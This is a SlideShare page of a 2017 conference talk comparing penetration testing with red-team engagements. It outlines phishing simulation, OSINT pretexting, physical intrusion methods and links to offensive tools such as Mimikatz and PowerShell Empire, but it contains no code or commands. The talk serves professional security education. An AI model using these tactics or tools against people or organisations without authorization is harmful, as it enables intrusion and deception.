SlideShare a Scribd company logo

[AVTOKYO 2017] What is red team?

Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE

AV TOKYO 2017(http://ja.avtokyo.org/)の講演資料を公開します。

Technology
1 of 37
What is Red Team Service? ~Latest Penetration Test Trends in U.S.~ TOMOHISA ISHIKAWA scientia.admin@gmail.com www.scientia-security.org
$$ WHO AM I ?  Tomohisa Ishikawa • Security Consultant (9 years experience) • Specialized Area • Penetration Test, IR, Security Consultation, Vulnerability Management, Awareness, Training, Global Security Management… • Various Speaker Experience • SANSFIRE 2011 & 2012, DEF CON 24 SE Village, LASCON 2016, BSides Philly 2017 • Certification Junkie • CISSP, CSSLP, CISA, CISM, CFE, GPEN, GWAPT, GXPN, GWEB, GSNA, GREM, GCIH
Objective  Sharing One Year Experience in security team of U.S. insurance company  Understanding difference of Methodology • Traditional “Penetration Test” vs. “Red Team”
皆様の会社(組織)、ペネトレーションテスト やっていますか? Do you have penetration test in your organization??
日本で言うペネトレーションテストって… Penetration Test in Japan is …  某L社とか某N社のページを見てみると.. Let’s see HP of N company, L company, M company… • Webセキュリティ診断サービス (Web Application Testing) • プラットフォーム診断サービス (Platform Testing) • 標的型攻撃診断サービス(メール訓練サービス・出口対策検証) • 無線LAN診断サービス • DDoS体制検証サービス  安全第一!! Safety of system is First Priority.  ※ ちなみにセキュリティ診断とペネトレーションテストをほぼ同じ意味で使いますが、宗教上の 理由でこの二つを一緒に語ることが許せない人とは適当に読み替えてください。
米国に行くと… 意外とペネトレーションテスターって 言わない人が多い? Only few people said “I am a penetration tester”
「ペネトレーションテスト」ってダサい? “Penetration Test” is tacky???
What is “Red Team”?  もともと、諜報機関で生まれた概念 Originally, it is from intelligence community  敵の観点から作戦を検証したり、取得した情報の信憑性を批判的に 検証するチームのこと Verify strategies or information from adversary view point • Devil‘s Advocate(悪魔の弁護人) • CIA Red Cell
What is the difference btw “Red Team” and “Pen Test”? ⇒ Coverage is different!! Digital Physical Social • Web Application Testing • Platform Testing • APT Simulation • APT Mail Awareness training • Vishing(Voice Phishing) • OSINT • Tail Gating • Impersonation • ID Card Cloning • Physical Access to box • Elevator Hacking • Physical Control Bypass
 According to Gartner… • Long Term Challenge (NOT point-in-time assessment) • より長期的にテストを実施。実施時間も24時間いつでも実施する. • Defense Coordination • Blue Teamの機能も含めて評価を行い、改善につなげる。 • Adversary Simulation • 攻撃者そのものの観点から実施する。(3つの観点の融合) • Controlled but Real Intrusion What is the difference btw “Red Team” and “Pen Test”? ⇒ Different Feature
Case 1: Physical Penetration Test
 Objective • どこまで内部侵入して情報が取れるのか? Is it possible to bypass physical access control?  Methodology • Breaking Lock (Picking, impassioning, Bypassing) • Elevator Hacking • RFID Cloning • Social Engineering Physical Penetration Test
Case 2: APT Adversary Simulation Service
 SLA of APT Adversary Simulation Service is following. • Awareness Phishing • Penetration Test Phishing • Red Team Phishing 標的型攻撃サービス APT Adversary Simulation Service
 Attempting attacks as same as “Japan Pension Service” • Following Cyber Kill Chain • OSINT & SOCMINT • Selecting 2~3 targets, and sending attached email • Exploitation • Using “Fresh” vulnerability & Exploit • Post Exploitation with PowerShell • Password Cracking with GPU • Lateral Movement & Reaching out “Treasures” Red Team Phishing
OSINT Example  Check LinkedIn and find out target  Analyzing Twitter with SOCMINT Tools • Target has a tendency to buy shoes in apparel shop • Sending Coupon by pretending as appeal shop
TOOLS  OSINT • Maltago https://www.paterva.com/web7/ • FOCA https://www.elevenpaths.com/labstools/foca/index.html • SpiderFoot http://www.spiderfoot.net/ • Discovery Script https://github.com/leebaird/discover • Recon-ng https://bitbucket.org/LaNMaSteR53/recon-ng • Cymon https://cymon.io/ • WeLink https://welink.com/dashboard/ • GEOFEEDIA https://geofeedia.com/ • ECHOSEC https://www.echosec.net/
TOOLS  OTHER TOOLS (Part of them is experimental) • GoPhish https://getgophish.com/ • Social Engineering Toolkit in Kali Linux • Cobalt Strike https://www.cobaltstrike.com/ • Mimikatz https://github.com/gentilkiwi/mimikatz • Responder https://github.com/SpiderLabs/Responder • IPMI http://fish2.com/ipmi/remote-pw-cracking.html • MITM Framework https://github.com/byt3bl33d3r/MITMf • Spray WMI https://github.com/trustedsec/spraywmi
TOOLS  PowerShell Tools • PowerShell Empire https://github.com/EmpireProject/Empire • EmPyre (Python) https://github.com/EmpireProject/EmPyre • PowerSploit https://github.com/PowerShellMafia/PowerSploit • Including PowerView・Invoke-Mimikatz・PowerUp • Veil Framework https://www.veil-framework.com/ • Nishang https://github.com/samratashok/nishang • Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation • PS Attack https://github.com/jaredhaight/psattack • NaishoDeNusumu https://github.com/3nc0d3r/NaishoDeNusumu • BloodHound https://github.com/BloodHoundAD/BloodHound
Resource  Great Presentation • AD Security https://adsecurity.org/ • All presentation is awesome • Adversarial Post-Exploitation: Lessons From The Pros • https://www.youtube.com/watch?v=x3crG-hM9sc • A Year in the Empire • https://www.youtube.com/watch?v=ngvHshHCt_8 • PowerShell Secrets and Tactics • https://www.youtube.com/watch?v=EQv4bJnCw8M • Introducing PowerShell into your Arsenal with PS>Attack • https://www.youtube.com/watch?v=mPckt6HQPsw • Invoke-Obfuscation: PowerShell obFUsk8tion Techniques • https://www.youtube.com/watch?v=P1lkflnWb0I
From Blue Team Side  以下が本当に重要!! • Full Spectrum Visibility (完全な可視化) • Targeted Containment (標的型封じ込め)  EDR (Endpoint Detection & Response) • Ex) Tanium, Fidelis, Carbon Black, FireEye, Crowd Strike, Red Cloak, Cyber Reason…
Wrap-Up  “Red team” is U.S. trends  Focus on comprehensive test
Thank You!!  If you have any questions, please feel free to contact me Contact Info • Email scientia.admin@gmail.com • JP Blog www.scientia-security.org
Bonus Session
Digital Penetration Test Certification  Certification for Penetration Tester • CEH (by EC-Council) • GIAC (by SANS) • OSCP (by Offensive Security)

Recommended

Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
HDC2022:Track A - 脅威ハンティング
HDC2022:Track A - 脅威ハンティングHDC2022:Track A - 脅威ハンティング
HDC2022:Track A - 脅威ハンティングTomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageErik Van Buggenhout
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for BeginnersSKMohamedKasim
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01Michael Gough
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 

Recommended

Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
HDC2022:Track A - 脅威ハンティング
HDC2022:Track A - 脅威ハンティングHDC2022:Track A - 脅威ハンティング
HDC2022:Track A - 脅威ハンティングTomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageErik Van Buggenhout
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for BeginnersSKMohamedKasim
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01Michael Gough
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Automated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceAutomated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceJason Choi
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBGA Cyber Security
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber worldAkash Sarode
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Frameworkn|u - The Open Security Community
 
Oscp preparation
Oscp preparationOscp preparation
Oscp preparationManich Koomsusi
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainSuwitcha Musijaral CISSP,CISA,GWAPT,SNORTCP
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIBGA Cyber Security
 
Next Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMNext Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMBGA Cyber Security
 
Sigma and YARA Rules
Sigma and YARA RulesSigma and YARA Rules
Sigma and YARA RulesLionel Faleiro
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Mitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı TespitiMitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı TespitiBGA Cyber Security
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?BGA Cyber Security
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 
米国のペネトレーションテスト事情(ssmjp)
米国のペネトレーションテスト事情(ssmjp)米国のペネトレーションテスト事情(ssmjp)
米国のペネトレーションテスト事情(ssmjp)Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 

More Related Content

What's hot

Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Automated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceAutomated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceJason Choi
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBGA Cyber Security
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber worldAkash Sarode
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIBGA Cyber Security
 
Next Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMNext Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMBGA Cyber Security
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Mitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı TespitiMitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı TespitiBGA Cyber Security
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?BGA Cyber Security
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 

What's hot (20)

Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
 
Automated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceAutomated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security Intelligence
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber world
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 
Oscp preparation
Oscp preparationOscp preparation
Oscp preparation
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
 
Next Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAMNext Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAM
 
Sigma and YARA Rules
Sigma and YARA RulesSigma and YARA Rules
Sigma and YARA Rules
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Mitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı TespitiMitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı Tespiti
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
 

Viewers also liked

ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催についてSECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催についてtakesako
 
初心者向けインターネットの仕組みと8/25の障害についての説明
初心者向けインターネットの仕組みと8/25の障害についての説明初心者向けインターネットの仕組みと8/25の障害についての説明
初心者向けインターネットの仕組みと8/25の障害についての説明Ken SASAKI
 
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
osc2016do ひげで学ぶWebアプリケーションに潜むリスクosc2016do ひげで学ぶWebアプリケーションに潜むリスク
osc2016do ひげで学ぶWebアプリケーションに潜むリスクIerae Security
 
Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)Akitsugu Ito
 
Ipsj77フォレンジック研究動向
Ipsj77フォレンジック研究動向Ipsj77フォレンジック研究動向
Ipsj77フォレンジック研究動向UEHARA, Tetsutaro
 
[CEDEC2017] LINEゲームのセキュリティ診断手法
[CEDEC2017] LINEゲームのセキュリティ診断手法[CEDEC2017] LINEゲームのセキュリティ診断手法
[CEDEC2017] LINEゲームのセキュリティ診断手法LINE Corporation
 
ノリとその場の勢いでPocを作った話
ノリとその場の勢いでPocを作った話ノリとその場の勢いでPocを作った話
ノリとその場の勢いでPocを作った話zaki4649
 
徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティHiroshi Tokumaru
 
CpawCTF 勉強会 Network
CpawCTF 勉強会 NetworkCpawCTF 勉強会 Network
CpawCTF 勉強会 NetworkTakaaki Hoyo
 
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010Sen Ueno
 
Metasploitでペネトレーションテスト
MetasploitでペネトレーションテストMetasploitでペネトレーションテスト
Metasploitでペネトレーションテストsuper_a1ice
 
新卒2年目が鍛えられたコードレビュー道場
新卒2年目が鍛えられたコードレビュー道場新卒2年目が鍛えられたコードレビュー道場
新卒2年目が鍛えられたコードレビュー道場Recruit Technologies
 
SSL/TLSの基礎と最新動向
SSL/TLSの基礎と最新動向SSL/TLSの基礎と最新動向
SSL/TLSの基礎と最新動向shigeki_ohtsu
 

Viewers also liked (16)

米国のペネトレーションテスト事情(ssmjp)
米国のペネトレーションテスト事情(ssmjp)米国のペネトレーションテスト事情(ssmjp)
米国のペネトレーションテスト事情(ssmjp)
 
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
 
[BurpSuiteJapan]Burp Suite回答編
[BurpSuiteJapan]Burp Suite回答編[BurpSuiteJapan]Burp Suite回答編
[BurpSuiteJapan]Burp Suite回答編
 
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催についてSECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催について
 
初心者向けインターネットの仕組みと8/25の障害についての説明
初心者向けインターネットの仕組みと8/25の障害についての説明初心者向けインターネットの仕組みと8/25の障害についての説明
初心者向けインターネットの仕組みと8/25の障害についての説明
 
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
osc2016do ひげで学ぶWebアプリケーションに潜むリスクosc2016do ひげで学ぶWebアプリケーションに潜むリスク
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
 
Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)
 
Ipsj77フォレンジック研究動向
Ipsj77フォレンジック研究動向Ipsj77フォレンジック研究動向
Ipsj77フォレンジック研究動向
 
[CEDEC2017] LINEゲームのセキュリティ診断手法
[CEDEC2017] LINEゲームのセキュリティ診断手法[CEDEC2017] LINEゲームのセキュリティ診断手法
[CEDEC2017] LINEゲームのセキュリティ診断手法
 
ノリとその場の勢いでPocを作った話
ノリとその場の勢いでPocを作った話ノリとその場の勢いでPocを作った話
ノリとその場の勢いでPocを作った話
 
徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ
 
CpawCTF 勉強会 Network
CpawCTF 勉強会 NetworkCpawCTF 勉強会 Network
CpawCTF 勉強会 Network
 
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
 
Metasploitでペネトレーションテスト
MetasploitでペネトレーションテストMetasploitでペネトレーションテスト
Metasploitでペネトレーションテスト
 
新卒2年目が鍛えられたコードレビュー道場
新卒2年目が鍛えられたコードレビュー道場新卒2年目が鍛えられたコードレビュー道場
新卒2年目が鍛えられたコードレビュー道場
 
SSL/TLSの基礎と最新動向
SSL/TLSの基礎と最新動向SSL/TLSの基礎と最新動向
SSL/TLSの基礎と最新動向
 

Similar to [AVTOKYO 2017] What is red team?

2018 FRSecure CISSP Mentor Program Session 9
2018 FRSecure CISSP Mentor Program Session 92018 FRSecure CISSP Mentor Program Session 9
2018 FRSecure CISSP Mentor Program Session 9FRSecure
 
2019 FRSecure CISSP Mentor Program: Class Nine
2019 FRSecure CISSP Mentor Program: Class Nine2019 FRSecure CISSP Mentor Program: Class Nine
2019 FRSecure CISSP Mentor Program: Class NineFRSecure
 
The_Pentester_Blueprint.pdf
The_Pentester_Blueprint.pdfThe_Pentester_Blueprint.pdf
The_Pentester_Blueprint.pdfgcara4
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!Steven Carlson
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration TestingScott Sutherland
 
Purple Teaming - The Collaborative Future of Penetration Testing
Purple Teaming - The Collaborative Future of Penetration TestingPurple Teaming - The Collaborative Future of Penetration Testing
Purple Teaming - The Collaborative Future of Penetration TestingFRSecure
 
The difference between Penetration Testing and Red Team
The difference between Penetration Testing and Red TeamThe difference between Penetration Testing and Red Team
The difference between Penetration Testing and Red TeamNimrod Levy
 
OSSF 2018 - Jamie Jones of GitHub - Pull what where? Contributing to Open Sou...
OSSF 2018 - Jamie Jones of GitHub - Pull what where? Contributing to Open Sou...OSSF 2018 - Jamie Jones of GitHub - Pull what where? Contributing to Open Sou...
OSSF 2018 - Jamie Jones of GitHub - Pull what where? Contributing to Open Sou...FINOS
 
Software Security Initiative Capabilities: Where Do I Begin?
Software Security Initiative Capabilities: Where Do I Begin? Software Security Initiative Capabilities: Where Do I Begin?
Software Security Initiative Capabilities: Where Do I Begin? Cigital
 
Incident response before:after breach
Incident response before:after breachIncident response before:after breach
Incident response before:after breachSumedt Jitpukdebodin
 
FUEL_USERS_GROUP
FUEL_USERS_GROUPFUEL_USERS_GROUP
FUEL_USERS_GROUPWill Pearce
 
Secure 360 adversary simulation
Secure 360 adversary simulationSecure 360 adversary simulation
Secure 360 adversary simulationChris Hernandez
 
2019 FRSecure CISSP Mentor Program: Class Ten
2019 FRSecure CISSP Mentor Program: Class Ten2019 FRSecure CISSP Mentor Program: Class Ten
2019 FRSecure CISSP Mentor Program: Class TenFRSecure
 
Conf 2019 - Workshop: Liam Glanfield - know your threat actor
Conf 2019 - Workshop: Liam Glanfield - know your threat actorConf 2019 - Workshop: Liam Glanfield - know your threat actor
Conf 2019 - Workshop: Liam Glanfield - know your threat actorTechExeter
 
Zen and the art of Security Testing
Zen and the art of Security TestingZen and the art of Security Testing
Zen and the art of Security TestingTEST Huddle
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityClaus Cramon Houmann
 

Similar to [AVTOKYO 2017] What is red team? (20)

Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
 
Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
 
2018 FRSecure CISSP Mentor Program Session 9
2018 FRSecure CISSP Mentor Program Session 92018 FRSecure CISSP Mentor Program Session 9
2018 FRSecure CISSP Mentor Program Session 9
 
2019 FRSecure CISSP Mentor Program: Class Nine
2019 FRSecure CISSP Mentor Program: Class Nine2019 FRSecure CISSP Mentor Program: Class Nine
2019 FRSecure CISSP Mentor Program: Class Nine
 
The_Pentester_Blueprint.pdf
The_Pentester_Blueprint.pdfThe_Pentester_Blueprint.pdf
The_Pentester_Blueprint.pdf
 
Sexy defense
Sexy defenseSexy defense
Sexy defense
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
 
Purple Teaming - The Collaborative Future of Penetration Testing
Purple Teaming - The Collaborative Future of Penetration TestingPurple Teaming - The Collaborative Future of Penetration Testing
Purple Teaming - The Collaborative Future of Penetration Testing
 
The difference between Penetration Testing and Red Team
The difference between Penetration Testing and Red TeamThe difference between Penetration Testing and Red Team
The difference between Penetration Testing and Red Team
 
Penetration testing must die
Penetration testing must diePenetration testing must die
Penetration testing must die
 
OSSF 2018 - Jamie Jones of GitHub - Pull what where? Contributing to Open Sou...
OSSF 2018 - Jamie Jones of GitHub - Pull what where? Contributing to Open Sou...OSSF 2018 - Jamie Jones of GitHub - Pull what where? Contributing to Open Sou...
OSSF 2018 - Jamie Jones of GitHub - Pull what where? Contributing to Open Sou...
 
Software Security Initiative Capabilities: Where Do I Begin?
